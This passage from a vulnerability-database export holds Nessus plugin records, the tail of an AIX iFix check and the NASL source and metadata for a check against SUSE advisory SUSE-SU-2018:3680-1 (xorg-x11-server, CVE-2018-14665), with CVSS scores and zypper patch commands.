get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.2\", ml:\"00\", patch:\"IJ11546s0a\", package:\"X11.base.rte\", minfilesetver:\"7.2.0.0\", maxfilesetver:\"7.2.0.1\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-14T06:16:17", "description": "This update for xorg-x11-server fixes the following issues :\n\nCVE-2018-14665: Disable -logfile and -modulepath when running with\nelevated privileges (bsc#1112020,\n\nNote that SUSE by default does not run with elevated privileges, so\nthe default installation is not affected by this problem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 21, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-02T00:00:00", "title": "SUSE SLED15 / SLES15 Security Update : xorg-x11-server (SUSE-SU-2018:3680-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "modified": "2019-01-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:xorg-x11-server-sdk", "p-cpe:/a:novell:suse_linux:xorg-x11-server", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:xorg-x11-server-source", "p-cpe:/a:novell:suse_linux:xorg-x11-server-extra-debuginfo", "p-cpe:/a:novell:suse_linux:xorg-x11-server-extra", "p-cpe:/a:novell:suse_linux:xorg-x11-server-debuginfo", "p-cpe:/a:novell:suse_linux:xorg-x11-server-debugsource"], "id": "SUSE_SU-2018-3680-1.NASL", "href": "https://www.tenable.com/plugins/nessus/120159", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3680-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120159);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-14665\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : xorg-x11-server (SUSE-SU-2018:3680-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for xorg-x11-server fixes the following issues :\n\nCVE-2018-14665: Disable -logfile and -modulepath when running with\nelevated privileges (bsc#1112020,\n\nNote that SUSE by default does not run with 
elevated privileges, so\nthe default installation is not affected by this problem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1112020\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-14665/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183680-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2b1817e0\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 15:zypper in -t patch\nSUSE-SLE-Product-WE-15-2018-2617=1\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2018-2617=1\n\nSUSE Linux Enterprise Module for Development Tools 15:zypper in -t\npatch SUSE-SLE-Module-Development-Tools-15-2018-2617=1\n\nSUSE Linux Enterprise Module for Basesystem 15:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-2018-2617=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", 